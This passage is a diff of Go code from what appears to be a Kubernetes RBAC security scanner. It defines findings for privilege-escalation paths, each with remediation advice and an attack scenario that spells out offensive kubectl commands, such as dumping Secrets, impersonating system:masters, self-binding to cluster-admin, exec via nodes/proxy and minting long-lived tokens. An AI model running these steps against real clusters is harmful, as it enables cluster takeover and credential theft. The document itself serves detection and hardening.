+func contentPrivesc005(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s read access to Secrets — %s", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s can `get`, `list`, or `watch` core `secrets` via binding `%s` → role `%s`. %s.\n\n"+
+			"The Kubernetes documentation is explicit that `list` and `watch` reveal Secret contents in the response body — they are not metadata-only verbs — so all three verbs leak the same data.\n\n"+
+			"Kubernetes Secrets typically hold ServiceAccount tokens, kubeconfigs, image-pull credentials, TLS private keys, database passwords, and integration secrets for cloud APIs. Once Secret contents are exposed, the holder can authenticate as the corresponding ServiceAccount/user, which usually amplifies the original blast radius far beyond 'read access'. Cluster-wide reads include `kube-system` ServiceAccount tokens, which are routinely cluster-admin-equivalent.",
+			subjectKey(subject), sourceBinding, sourceRole, scope.Detail),
+		Impact: fmt.Sprintf("%s read of every Secret — ServiceAccount tokens, TLS keys, registry credentials, integration secrets — enabling identity replay and cross-namespace lateral movement.", phrase),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker reaches %s (compromised pod, leaked kubeconfig, or stolen token).", subjectKey(subject)),
+			"They run `kubectl get secrets -o yaml` in scope and base64-decode every `data` field.",
+			"They identify Secrets of type `kubernetes.io/service-account-token` (legacy) or call the TokenRequest API with harvested credentials.",
+			"They replay the highest-privileged token against the API server (`kubectl --token=<jwt> get clusterrolebindings`).",
+			"They pivot to cloud APIs using extracted IRSA / Workload Identity / cloud-provider credentials, or persist by writing a backdoor into a privileged Deployment.",
+		},
+		Remediation: "Remove `get`/`list`/`watch` on `secrets` from this subject; if a specific Secret is genuinely needed, scope by `resourceNames` to that one name.",
+		RemediationSteps: []string{
+			"Confirm the workload genuinely needs API-time Secret access. Most apps consume Secrets via volume/env injection at pod start and don't need RBAC read.",
+			"If runtime access is required, scope the rule by `resourceNames` to the exact Secret(s) the workload reads — never leave it as 'all secrets'. Drop `list` and `watch`; keep only `get`.",
+			"Move the binding from cluster-wide to namespace-scoped (RoleBinding instead of ClusterRoleBinding) so the blast radius is bounded.",
+			fmt.Sprintf("Verify with `%s` returning `no`.", kubectlAuthCanI("list", "secrets", ruleNamespace, subject)),
+			"For sensitive Secrets (TLS keys, cloud credentials), consider an external secret store (Vault, AWS/GCP Secrets Manager via CSI driver) and enable encryption-at-rest with a KMS-backed `EncryptionConfiguration`.",
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — Good practices for Kubernetes Secrets", URL: "https://kubernetes.io/docs/concepts/security/secrets-good-practices/"},
+			{Title: "Kubernetes — RBAC Good Practices: Secrets read", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/#secrets"},
+			{Title: "Kubernetes — Encryption at Rest (KMS provider)", URL: "https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/"},
+			{Title: "Datadog Security Labs — Persistence via TokenRequest API", URL: "https://securitylabs.datadoghq.com/articles/kubernetes-tokenrequest-api/"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_007, mitreT1528, mitreT1078_004},
+	}
+}
+
+// contentPrivesc001 — Pod creation (KUBE-PRIVESC-001).
+func contentPrivesc001(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s pod creation — token-theft and node-takeover path (%s)", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s can `create` pods via binding `%s` → role `%s`. %s.\n\n"+
+			"Under Kubernetes' RBAC model, pod creation is one of the most powerful permissions because the API server does not police the privileges of the pod being created — only the create verb itself. A pod is a request to run code as a ServiceAccount; by choosing `spec.serviceAccountName` the attacker borrows the identity (and RBAC permissions) of any ServiceAccount in the target namespace, with the token mounted automatically at `/var/run/secrets/kubernetes.io/serviceaccount/token`.\n\n"+
+			"Beyond identity hopping, a created pod can request `hostPath`, `hostNetwork`, `hostPID`, `privileged: true`, or `SYS_ADMIN` — none of which are blocked by RBAC; only Pod Security Admission or a policy engine (Kyverno, Gatekeeper, ValidatingAdmissionPolicy) can stop them. A typical attack mounts `/` from the host and reads `/etc/kubernetes/pki/admin.conf` directly.",
+			subjectKey(subject), sourceBinding, sourceRole, scope.Detail),
+		Impact: fmt.Sprintf("Run arbitrary code as any ServiceAccount in %s (including privileged ones); optionally request privileged/host-mount pods to escape to the underlying node.", phrase),
+		AttackScenario: []string{
+			"Attacker enumerates target namespaces — `kubectl get sa -A` to find privileged ServiceAccounts (e.g. `kube-system/clusterrole-aggregation-controller`).",
+			"They craft a pod manifest with `spec.serviceAccountName: <privileged-sa>` and any container image they control.",
+			"They `kubectl apply -f` the pod; the kubelet mounts the privileged ServiceAccount's JWT into the container at the well-known path.",
+			"They `exec` into the pod (or have the container phone home), read the token, and replay it against the API server.",
+			"Optionally, they instead create a pod with `hostPID: true` + `privileged: true` + `hostPath` of `/` and break out to the node.",
+		},
+		Remediation: "Remove direct pod-create rights from non-platform identities; have CI/CD or controllers create workload objects (Deployments) so the controller-manager creates the pod under its own ServiceAccount.",
+		RemediationSteps: []string{
+			"Replace direct `create` on `pods` with `create`/`update` on `deployments` (or the appropriate workload controller).",
+			"Enforce `restricted` Pod Security Standard via `pod-security.kubernetes.io/enforce=restricted` namespace label so privileged/hostPath pods are rejected at admission.",
+			"Add a Kyverno/Gatekeeper policy that requires `automountServiceAccountToken: false` on user-created pods, or pins them to a non-privileged ServiceAccount.",
+			fmt.Sprintf("Verify with `%s` returning `no`.", kubectlAuthCanI("create", "pods", ruleNamespace, subject)),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — RBAC Good Practices: Workload creation", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/#workload-creation"},
+			{Title: "Kubernetes — Pod Security Standards", URL: "https://kubernetes.io/docs/concepts/security/pod-security-standards/"},
+			{Title: "Kubernetes — Pod Security Admission", URL: "https://kubernetes.io/docs/concepts/security/pod-security-admission/"},
+			{Title: "Bishop Fox — Bad Pods: Pod Privilege Escalation", URL: "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1610, mitreT1552_007, mitreT1611, mitreT1078_004},
+	}
+}
+
+// contentPrivesc003 — Workload-controller mutation (KUBE-PRIVESC-003).
+func contentPrivesc003(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s workload-controller mutation can spawn privileged pods — %s", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s can `create`/`update`/`patch` workload controllers (`deployments`, `daemonsets`, `statefulsets`, `jobs`, `cronjobs`) via `%s` → `%s`. %s.\n\n"+
+			"Anyone who can write a workload template inherits the same implicit permissions as `pods/create`: choice of ServiceAccount, choice of Pod Security context, and choice of host-level features. The specific danger of controller mutation (vs. pod create) is durability and stealth: a `kubectl edit deployment` adding a `privileged: true` sidecar produces pods continuously — restart-loop the pod and you get a fresh shell every time.\n\n"+
+			"DaemonSet write is the most dangerous variant because a DaemonSet runs one pod on every node — including new nodes added later. CronJobs offer time-based persistence that survives pod evictions, node reboots, and short-lived RBAC remediations. A realistic incident: an attacker with `patch daemonsets` in `kube-system` mutates `kube-proxy` to add a malicious sidecar inheriting the existing pod's host-mounts and ServiceAccount.",
+			subjectKey(subject), sourceBinding, sourceRole, scope.Detail),
+		Impact: fmt.Sprintf("Spawn (or mutate existing) pods running as any ServiceAccount in %s; DaemonSet write specifically yields one attacker pod per node, including future nodes.", phrase),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker enumerates writable controllers — `%s`.", kubectlAuthCanI("patch", "daemonsets", ruleNamespace, subject)),
+			"They identify a high-value DaemonSet (e.g. `kube-system/kube-proxy`, `kube-system/cilium`, or any node-agent that already runs privileged).",
+			"They `kubectl patch` to add a sidecar container under their control, inheriting the existing pod's host-mounts, capabilities, and ServiceAccount.",
+			"The DaemonSet controller rolls the change to every node; the attacker now has a privileged shell on every node and a node-level token on each.",
+			"They use the token to enumerate cluster Secrets and pivot to control-plane components. Persistence survives subject-token rotation because the malicious sidecar continues running.",
+		},
+		Remediation: "Restrict workload-controller mutation to platform/CI identities; route application changes through GitOps with PR review.",
+		RemediationSteps: []string{
+			"Audit who has `create`/`update`/`patch` on `deployments,daemonsets,statefulsets,jobs,cronjobs`. Most application identities should not have this.",
+			"Move deployment changes behind GitOps (Argo CD/Flux) so humans push to Git and the controller applies the change under its own ServiceAccount.",
+			"Add a Kyverno/Gatekeeper policy that rejects pod templates with `privileged`, `hostPID`, `hostNetwork`, `hostPath` mounts, or `automountServiceAccountToken: true` outside an explicit allowlist.",
+			fmt.Sprintf("For DaemonSets specifically, restrict creation to named platform ServiceAccounts. Verify with `%s` returning `no`.", kubectlAuthCanI("create", "daemonsets", "kube-system", subject)),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — RBAC Good Practices: Workload creation", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/#workload-creation"},
+			{Title: "Kubernetes — DaemonSet (runs on every node)", URL: "https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/"},
+			{Title: "Kyverno — Disallow privileged containers policy", URL: "https://kyverno.io/policies/pod-security/baseline/disallow-privileged-containers/disallow-privileged-containers/"},
+			{Title: "Microsoft Threat Matrix for Kubernetes — Privilege Escalation", URL: "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/tactics/PrivilegeEscalation/"},
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1610, mitreT1098, mitreT1078_004},
+	}
+}
+
+// contentPrivesc008 — Impersonate (KUBE-PRIVESC-008).
+func contentPrivesc008(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s `impersonate` permission — %s", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s has the `impersonate` verb on `users`/`groups`/`serviceaccounts` via `%s` → `%s`. %s.\n\n"+
+			"Kubernetes' impersonation lets a request set `Impersonate-User`/`Impersonate-Group` headers (or `kubectl --as`) so the API server processes the request as a different identity. The Kubernetes project flags this in `RBAC Good Practices` as one of three verbs (alongside `bind` and `escalate`) that override normal RBAC limits.\n\n"+
+			"Most damaging is the ability to impersonate the `system:masters` group, which is hardcoded inside kube-apiserver to bypass RBAC entirely — there is no Role or RoleBinding that grants `system:masters` membership; the apiserver simply trusts the assertion. `kubectl --as=admin --as-group=system:masters get secrets -A` runs as cluster-admin, full stop. Impersonation is also stealthier than a binding change because audit logs show `user.username` as the original subject.",
+			subjectKey(subject), sourceBinding, sourceRole, scope.Detail),
+		Impact: fmt.Sprintf("Act as any user/group/ServiceAccount in %s; impersonating `system:masters` bypasses all RBAC checks irrevocably.", phrase),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker confirms the verb — `%s`.", kubectlAuthCanI("impersonate", "users", ruleNamespace, subject)),
+			"They run `kubectl --as=admin --as-group=system:masters get clusterrolebindings` to confirm `system:masters` impersonation succeeds.",
+			"They impersonate the highest-privileged ServiceAccount they can find (e.g. `system:serviceaccount:kube-system:clusterrole-aggregation-controller`) and exfiltrate Secrets cluster-wide.",
+			"They establish persistence by creating a benign-looking ClusterRoleBinding via the impersonated identity (audit logs blame the impersonated SA, not the attacker).",
+			"They optionally add their own user to a privileged group via OIDC group claims, providing identity-layer persistence that survives RBAC remediation.",
+		},
+		Remediation: "Remove `impersonate` entirely; if a SaaS console truly needs it, gate on `resourceNames` and never grant it on `groups`.",
+		RemediationSteps: []string{
+			"Remove `impersonate` on `users`, `groups`, and `serviceaccounts`. The vast majority of workloads have no need for impersonation.",
+			"If impersonation is genuinely required, scope to `users` only (not `groups` — never allow `system:masters`), use `resourceNames` to allow only specific identities, and never grant cluster-wide.",
+			"Enable Impersonate-* audit policy at `Metadata` level minimum so every impersonated request is logged with the original caller. SIEM-alert on impersonation of any `system:` user or group.",
+			fmt.Sprintf("Verify with `%s` returning `no`.", kubectlAuthCanI("impersonate", "'*'", ruleNamespace, subject)),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — User Impersonation", URL: "https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation"},
+			{Title: "Kubernetes — RBAC Good Practices: Privilege escalation risks", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/#privilege-escalation-risks"},
+			{Title: "Kubernetes — Auditing", URL: "https://kubernetes.io/docs/tasks/debug/debug-cluster/audit/"},
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078, mitreT1078_004, mitreT1550, mitreT1134},
+	}
+}
+
+// contentPrivesc009 — Bind/escalate (KUBE-PRIVESC-009).
+func contentPrivesc009(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s `bind`/`escalate` on roles — RBAC bypass (%s)", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s has the `bind` or `escalate` verb on `roles`/`clusterroles` via `%s` → `%s`. %s.\n\n"+
+			"Kubernetes' RBAC normally enforces a privilege-escalation guard: you cannot create a Role/RoleBinding granting permissions you do not already hold. The `escalate` and `bind` verbs are explicit, documented exceptions to that guard.\n\n"+
+			"`escalate` lets the subject author or modify a Role/ClusterRole with verbs and resources they don't currently possess — they rewrite an existing Role they're already bound to and instantly inherit whatever they wrote into it.\n\n"+
+			"`bind` lets the subject create a RoleBinding/ClusterRoleBinding referencing a (Cluster)Role they don't already hold. With `bind` on `clusterroles`, an attacker creates a ClusterRoleBinding from themselves to `cluster-admin` and is done in one step.",
+			subjectKey(subject), sourceBinding, sourceRole, scope.Detail),
+		Impact: fmt.Sprintf("Defeat the API-level escalation guard in %s; subject can grant itself any (Cluster)Role's permissions, including `cluster-admin`.", phrase),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker confirms the verb — `%s`.", kubectlAuthCanI("bind", "clusterroles", ruleNamespace, subject)),
+			"They write a one-line ClusterRoleBinding from their identity (or a SA they control) to the `cluster-admin` ClusterRole and `kubectl apply` it.",
+			"They re-use the same token (ClusterRoleBindings take effect immediately on next request) and have full cluster control.",
+			"Alternatively, with `escalate` on `clusterroles`, they `kubectl edit clusterrole/<role-they-already-have>` and add `*` verbs/resources/apiGroups, retaining the same binding.",
+			"They optionally name the new ClusterRoleBinding innocuously (e.g. `cluster-monitor-binding`) so the change is less visible to operators reviewing `kubectl get clusterrolebindings`.",
+		},
+		Remediation: "Remove `bind` and `escalate` from non-admin identities; gate any legitimate need behind admission policy that rejects bindings to `cluster-admin` or system roles.",
+		RemediationSteps: []string{
+			"Audit every Role/ClusterRole that includes `bind` or `escalate` — `kubectl get clusterroles,roles -A -o json | jq '.items[] | select(.rules[]?.verbs[]? | IN(\"bind\",\"escalate\"))'`.",
+			"Remove the verbs from this Role/ClusterRole. If operators legitimately need them (Argo CD, Crossplane, OperatorHub), scope `bind` with `resourceNames` to a list of low-privilege ClusterRoles.",
+			"Add a ValidatingAdmissionPolicy (or Kyverno) that rejects creation of any ClusterRoleBinding referencing `cluster-admin`/`admin`/`system:masters` outside a tiny admin allowlist.",
+			fmt.Sprintf("Verify with `%s` and `%s` both returning `no`.", kubectlAuthCanI("bind", "clusterroles", ruleNamespace, subject), kubectlAuthCanI("escalate", "roles", ruleNamespace, subject)),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — RBAC Authorization: Restrictions on role-binding creation/update", URL: "https://kubernetes.io/docs/reference/access-authn-authz/rbac/#restrictions-on-role-binding-creation-or-update"},
+			{Title: "Aqua Security — Kubernetes RBAC: How to Avoid Privilege Escalation", URL: "https://www.aquasec.com/blog/kubernetes-rbac-privilige-escalation/"},
+			{Title: "SCHUTZWERK — Kubernetes RBAC: Paths for Privilege Escalation", URL: "https://www.schutzwerk.com/en/blog/kubernetes-privilege-escalation-01/"},
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1098, mitreT1078_004, mitreT1548},
+	}
+}
+
+// contentPrivesc010 — RoleBinding write (KUBE-PRIVESC-010).
+func contentPrivesc010(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s write access to (Cluster)RoleBindings — self-grant path (%s)", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s can `create`/`update`/`patch` `rolebindings`/`clusterrolebindings` via `%s` → `%s`. %s.\n\n"+
+			"RoleBinding write is the most direct self-grant path in Kubernetes. Even with the API-level escalation guard active (binding only to roles whose permissions you already have), this permission is dangerous: if the subject already holds any powerful permission (often inherited from a default ClusterRole like `view`/`edit`), they can re-bind it to backup identities for persistence.\n\n"+
+			"A RoleBinding can also reference a *ClusterRole*, granting that ClusterRole's permissions inside the binding's namespace — so `create rolebindings` in `kube-system` is effectively cluster-admin-on-kube-system. Combined with `bind` on `clusterroles` (KUBE-PRIVESC-009), this bypasses the escalation guard entirely and yields cluster-admin in one step. Microsoft's Threat Matrix for Kubernetes documents this as the `Cluster-admin binding` technique.",
+			subjectKey(subject), sourceBinding, sourceRole, scope.Detail),
+		Impact: "Self-grant any role the subject already holds (or any ClusterRole, when paired with `bind` or when binding into namespaces); cluster-wide writes are one step from cluster-admin.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker enumerates what they can already bind — `%s` and `%s`.", kubectlAuthCanI("create", "clusterrolebindings", ruleNamespace, subject), kubectlAuthCanI("--list", "", ruleNamespace, subject)),
+			"If they hold a useful role, they create a ClusterRoleBinding granting that role to a backup identity for persistence.",
+			"With `bind` on `cluster-admin` (often via wildcards), they create a ClusterRoleBinding from themselves to `cluster-admin`.",
+			"Even without `bind`, in `kube-system` they create a RoleBinding referencing `system:controller:clusterrole-aggregation-controller` (which has `escalate` baked in) and pivot from there.",
+			"They name the binding innocuously (e.g. `monitoring-readonly`) so audit logs look benign.",
+		},
+		Remediation: "Restrict `create`/`update`/`patch` on `rolebindings`/`clusterrolebindings` to a small admin boundary; require all RBAC changes to flow through GitOps with PR review.",
+		RemediationSteps: []string{
+			"Audit who has write access to RBAC bindings — most workloads should have zero RBAC write rights.",
+			"Remove the verbs entirely from this Role/ClusterRole, or scope them with `resourceNames` to a fixed list of binding names that the workload owns.",
+			"Move RBAC management to GitOps (Argo CD/Flux) so binding changes require a PR. The GitOps controller should be the only identity with cluster-wide RBAC write access.",
+			"Add a ValidatingAdmissionPolicy that rejects ClusterRoleBindings to high-risk ClusterRoles (`cluster-admin`, `admin`, anything matching `*system:*`) outside an approved admin allowlist.",
+			fmt.Sprintf("Verify with `%s` returning `no`.", kubectlAuthCanI("create", "clusterrolebindings", ruleNamespace, subject)),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — RBAC Authorization: Restrictions on role-binding creation/update", URL: "https://kubernetes.io/docs/reference/access-authn-authz/rbac/#restrictions-on-role-binding-creation-or-update"},
+			{Title: "Microsoft Threat Matrix for Kubernetes — Cluster-admin binding", URL: "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Cluster-admin%20binding/"},
+			{Title: "Elastic — Kubernetes Cluster-Admin Role Binding Created (detection)", URL: "https://www.elastic.co/guide/en/security/8.19/kubernetes-cluster-admin-role-binding-created.html"},
+			{Title: "Google Cloud — Best practices for GKE RBAC", URL: "https://cloud.google.com/kubernetes-engine/docs/best-practices/rbac"},
+			refRBACGoodPractices,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1098, mitreT1078_004, mitreT1548},
+	}
+}
+
+// contentPrivesc012 — nodes/proxy (KUBE-PRIVESC-012).
+func contentPrivesc012(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	// nodes is cluster-scoped; report scope as cluster regardless of ruleNamespace value.
+	scope := models.Scope{
+		Level:  models.ScopeCluster,
+		Detail: "Cluster-wide kubelet API on every node (nodes is cluster-scoped)",
+	}
+	return ruleContent{
+		Title: fmt.Sprintf("`get nodes/proxy` — kubelet exec via API server (%s)", subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s can `get` `nodes/proxy` via `%s` → `%s`. Despite the read-only-sounding `get` verb, this permission lets the holder execute arbitrary commands inside any pod on any node by tunneling through the API server to the kubelet's internal HTTP API — `/exec`, `/run`, `/attach`, `/portforward`.\n\n"+
+			"The technical root cause: pod exec uses an HTTP-to-WebSocket upgrade. The API server authorizes the upgrade based on the initial GET against the proxy subresource — not against `pods/exec`. So a subject with `get nodes/proxy` can issue `kubectl get --raw '/api/v1/nodes/<node>/proxy/exec/...'` and end up with an interactive shell in any container, even with no `pods/exec` permission anywhere.\n\n"+
+			"Worse, the resulting commands execute over a direct API-server-to-kubelet WebSocket and are NOT recorded in apiserver audit logs at the `objectRef`/`verb` granularity — the audit log shows only the proxy GET. Detection requires node-level eBPF/process monitoring (Falco, Tetragon, KubeArmor), not API-server logs alone. Kubernetes issue #119640 and Stream Security have published proof-of-concept exploits.",
+			subjectKey(subject), sourceBinding, sourceRole),
+		Impact: "Cluster-wide remote code execution: exec into any container on any node via the kubelet API, with execution invisible to standard apiserver audit logs.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker confirms the verb — `%s`.", kubectlAuthCanI("get", "nodes/proxy", "", subject)),
+			"They list nodes (`kubectl get nodes`) and pick a high-value one — typically a control-plane node, or any node hosting `kube-apiserver`/`etcd`/operator pods.",
+			"They issue an exec request via the proxy endpoint, e.g. `kubectl get --raw '/api/v1/nodes/<node>/proxy/run/kube-system/<pod>/<container>?cmd=id'`, or open a WebSocket to `/exec`.",
+			"They land in the target container with that container's privileges (host-mounts, capabilities, ServiceAccount token).",
+			"From a control-plane container they read `/etc/kubernetes/pki/admin.conf` for cluster-admin credentials. The entire chain leaves no `pods/exec` audit entries.",
+		},
+		Remediation: "Remove `nodes/proxy` from this subject; reserve it for the API server itself and a tiny set of trusted operators that document this need.",
+		RemediationSteps: []string{
+			"Remove the rule entirely. Application workloads never need `nodes/proxy` — Kubernetes documents this as a 'severe escalation hazard' in RBAC Good Practices.",
+			"If a monitoring/observability stack genuinely requires it, migrate to the `nodes/metrics` and `nodes/stats` subresources, which expose telemetry without the exec endpoints.",
+			"Deploy node-level runtime monitoring (Falco, Tetragon, KubeArmor) to detect kubelet `/exec`, `/run`, `/attach` usage at the kernel level.",
+			fmt.Sprintf("Verify with `%s` returning `no`. Test the high-impact case with `kubectl get --raw '/api/v1/nodes/<node>/proxy/run/...'` returning 403.", kubectlAuthCanI("get", "nodes/proxy", "", subject)),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — RBAC Good Practices: nodes/proxy escalation hazard", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/#escalation"},
+			{Title: "kubernetes/kubernetes #119640 — Privilege escalation via nodes/proxy", URL: "https://github.com/kubernetes/kubernetes/issues/119640"},
+			{Title: "Aqua Security — Privilege Escalation from Node/Proxy Rights", URL: "https://www.aquasec.com/blog/privilege-escalation-kubernetes-rbac/"},
+			{Title: "Stream Security — Invisible Kubernetes RCE: Why Nodes/Proxy GET is More Dangerous Than You Think", URL: "https://www.stream.security/post/invisible-kubernetes-rec-why-nodes-proxy-get-is-more-dangerous-than-you-think"},
+			{Title: "Graham Helton — Kubernetes RCE Via Nodes/Proxy GET", URL: "https://grahamhelton.com/blog/nodes-proxy-rce"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1609, mitreT1611, mitreT1078_004, mitreT1610},
+	}
+}
+
+// contentPrivesc014 — serviceaccounts/token create (KUBE-PRIVESC-014).
+func contentPrivesc014(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s `create serviceaccounts/token` — token minting (%s)", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s can `create` on the `serviceaccounts/token` subresource via `%s` → `%s`. %s.\n\n"+
+			"The TokenRequest API (Kubernetes 1.22+) is the canonical way to mint a JWT ServiceAccount token, and its `create` verb is gated by RBAC on the `serviceaccounts/token` subresource. Anyone holding this verb on a ServiceAccount can mint a token authenticated as that ServiceAccount.\n\n"+
+			"Datadog Security Labs published a write-up on its abuse for persistence: an attacker mints a long-lived token for the highest-privileged ServiceAccount they can reach (commonly `kube-system/clusterrole-aggregation-controller`, which holds `escalate` on ClusterRoles), and uses that token as a backdoor that survives the original RBAC binding being removed. Crucially, this verb is NOT covered by 'list secrets' detections — TokenRequest tokens are NOT stored as Secret objects; they're issued live by the apiserver and never leave a footprint on disk.",
+			subjectKey(subject), sourceBinding, sourceRole, scope.Detail),
+		Impact: fmt.Sprintf("Mint a JWT for any ServiceAccount in %s. Cluster-wide variant trivially yields cluster-admin (mint a kube-system controller token). Tokens persist after the original binding is revoked.", phrase),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker confirms the verb — `%s`.", kubectlAuthCanI("create", "serviceaccounts/token", ruleNamespace, subject)),
+			"They enumerate high-privilege ServiceAccounts: `kubectl get clusterrolebindings -o json | jq '.items[].subjects[]?.name'` and pick one with `cluster-admin`, `system:masters`, or aggregated permissions.",
+			"They mint a long-lived token via the TokenRequest API: `kubectl create token <sa-name> -n <ns> --duration=8760h` (1 year), or call `/api/v1/namespaces/<ns>/serviceaccounts/<sa>/token` directly.",
+			"They `kubectl --token=<jwt> get nodes` and confirm the new identity.",
+			"They cache the token off-cluster as a backdoor: rotating the original binding does NOT invalidate an issued token until its `exp` claim — by default up to `--service-account-max-token-expiration`, often 1 year on legacy clusters.",
+		},
+		Remediation: "Remove `create` on `serviceaccounts/token` from non-control-plane identities; constrain any legitimate use with `resourceNames` to a tiny allowlist.",
+		RemediationSteps: []string{
+			"Remove the verb. Outside `kube-controller-manager` and a small set of token-broker components, nothing should hold this.",
+			"If a workload genuinely needs to mint tokens, scope with `resourceNames` to the exact ServiceAccounts it issues tokens for, never `*`.",
+			"Enforce a low maximum token expiration cluster-wide via `--service-account-max-token-expiration=1h` on the API server (or the cloud equivalent).",
+			"Capture every `create` on `serviceaccounts/token` at `RequestResponse` audit level and SIEM-alert on issuance to ServiceAccounts with `cluster-admin`/`escalate`/`bind` rights.",
+			fmt.Sprintf("Verify with `%s` returning `no`.", kubectlAuthCanI("create", "serviceaccounts/token", "kube-system", subject)),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — Service Accounts (TokenRequest API)", URL: "https://kubernetes.io/docs/concepts/security/service-accounts/"},
+			{Title: "Kubernetes — Managing Service Accounts (admin)", URL: "https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/"},
+			{Title: "Datadog Security Labs — Persistence via the TokenRequest API", URL: "https://securitylabs.datadoghq.com/articles/kubernetes-tokenrequest-api/"},
+			{Title: "Kubernetes API — TokenRequest v1", URL: "https://kubernetes.io/docs/reference/kubernetes-api/authentication-resources/token-request-v1/"},
+			refRBACGoodPractices,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1098_001, mitreT1528, mitreT1078_004},
+	}
+}
+
+// contentRBACOverbroad001 — Non-system subject bound to cluster-admin (KUBE-RBAC-OVERBROAD-001).
+func contentRBACOverbroad001(subject models.SubjectRef, bindingName string) ruleContent {
+	scope := models.Scope{
+		Level:  models.ScopeCluster,
+		Detail: "Cluster-wide cluster-admin (full read/write to every resource in every namespace)",
+	}
+	return ruleContent{
+		Title: fmt.Sprintf("Non-system subject %s directly bound to `cluster-admin`", subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("Subject %s is directly bound to the built-in `cluster-admin` ClusterRole via the ClusterRoleBinding `%s`. The `cluster-admin` ClusterRole grants `*` on `*` resources in `*` apiGroups — full read/write to every Kubernetes object including Secrets, RBAC, Nodes, Pods, and CRDs cluster-wide.\n\n"+
+			"Microsoft's Threat Matrix for Kubernetes lists `Cluster-admin binding` as a top-tier privilege-escalation technique, and CIS Kubernetes Benchmark control 5.1.1 ('Ensure that the cluster-admin role is only used where required') is one of the foundational RBAC hardening checks. Common anti-patterns that produce this finding: `kubectl create clusterrolebinding admin-binding --clusterrole=cluster-admin --user=alice@example.com` for a developer; Helm charts that ship a default ClusterRoleBinding to `cluster-admin`; SaaS/operator installers that take the lazy path.\n\n"+
+			"An attacker who compromises %s (stolen kubeconfig, vulnerable container, supply-chain backdoor, or OIDC token replay) immediately holds full cluster control with zero lateral movement required.",
+			subjectKey(subject), bindingName, subjectKey(subject)),
+		Impact: "Full cluster control: read/write every resource cluster-wide, mint any token, modify any binding, schedule on any node. Equivalent to root on the entire cluster.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises %s — stolen kubeconfig, OIDC session hijack, leaked CI credential, or compromised pod mounting the SA token.", subjectKey(subject)),
+			"They run `kubectl auth can-i '*' '*' --all-namespaces` and confirm `yes`.",
+			"They harvest all Secrets cluster-wide for cloud-credential pivot.",
